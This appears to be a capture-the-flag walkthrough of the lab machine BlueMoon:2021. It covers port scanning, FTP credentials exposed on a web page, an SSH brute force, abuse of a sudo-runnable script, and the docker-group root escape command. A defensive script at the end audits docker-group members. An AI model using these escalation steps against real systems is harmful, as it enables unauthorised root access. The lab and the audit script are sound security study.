Basic Summary:
So the machine is fairly simple: there are HTTP, FTP and SSH ports open. We obtain user credentials from the web server, then after the initial foothold we have a sh file we can run as another user. From there we have a docker image running; after entering the docker image we have root privileges. B00M
SIMPLE AS THAT. Let's speed through it.
##QUICK-LINKS
- RECON
- WEB
  i. Directories
  ii. /hidden_text
  iii. Ftp credentials
- FTP
  i. information.txt
  ii. p_list.txt
- Initial Foothold
- ROBIN
- Jerry
- Root
##RECON
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 2ce26378bc55fef3cb09a9d8262fcbd5 (RSA)
| 256 c4c86b489225a5f7009fabb256d5eddc (ECDSA)
|_ 256 a95b39a16e05910f753c880b557ca8c2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: BlueMoon:2021
MAC Address: 08:00:27:0A:CF:E0 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
##WEB
I tried to connect to the FTP server using anonymous credentials, but anonymous login was disabled. Then on checking the web server running on port 80,
Then on some directory busting,
On visiting the /hidden_text page,
#!/bin/bash
HOST=ip
USER=userftp
PASSWORD=ftpp@ssword
ftp -inv $HOST user $USER $PASSWORD
bye
EOF
USER=userftp
PASSWORD=ftpp@ssword
##FTP
#information.txt
#p_list.txt
#SSH-Brute-Force
Using the name we got from information.txt, ROBIN, and the wordlist given, we can brute-force the SSH login.
SSH://ROBIN:k4rv3ndh4nh4ck3r
##ROBIN
There is a directory named project.
And boom, the feedback variable can be used to change user:
$ sudo -u jerry ./feedbash.sh
##JERRY
And we're jerry, just like that!!!!
We are in the docker group, so let's just check for docker images.
##R00T
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
B00M we're root!
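This works because the Docker daemon runs as root, so any account in the docker group can have it bind-mount the host's / into a container. As an added example (not part of the original walkthrough), here is an audit a defender can run to list every account that holds that access; the sample group and passwd contents are constructed and the svc_build account is hypothetical.

```shell
#!/bin/sh
# docker_group_members GROUP_FILE PASSWD_FILE
# Prints, one per line (sorted, unique), every account that belongs to the
# "docker" group: supplementary members listed in the group file AND accounts
# whose primary GID in the passwd file is the docker GID (these never show up
# in the group file's member list, so a simple grep of /etc/group misses them).
docker_group_members() {
    group_file=$1
    passwd_file=$2
    awk -F: '
        # First file: group database (name:passwd:gid:member,member,...)
        FNR == NR {
            if ($1 == "docker") {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
            }
            next
        }
        # Second file: passwd database (name:passwd:uid:gid:...)
        gid != "" && $4 == gid { print $1 }
    ' "$group_file" "$passwd_file" | sort -u
}

# Constructed sample data, not taken from the target machine.
sample_dir=$(mktemp -d)
cat > "$sample_dir/group" <<'EOF'
root:x:0:
users:x:100:
docker:x:998:jerry
EOF
cat > "$sample_dir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
robin:x:1000:1000::/home/robin:/bin/bash
jerry:x:1002:1002::/home/jerry:/bin/bash
svc_build:x:1003:998::/home/svc_build:/bin/sh
EOF

# Every name printed here should be treated as having root on the host.
docker_group_members "$sample_dir/group" "$sample_dir/passwd"
rm -rf "$sample_dir"
```

On a live host, pass /etc/group and /etc/passwd as the two arguments.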
Thanks for reading. Happy hackin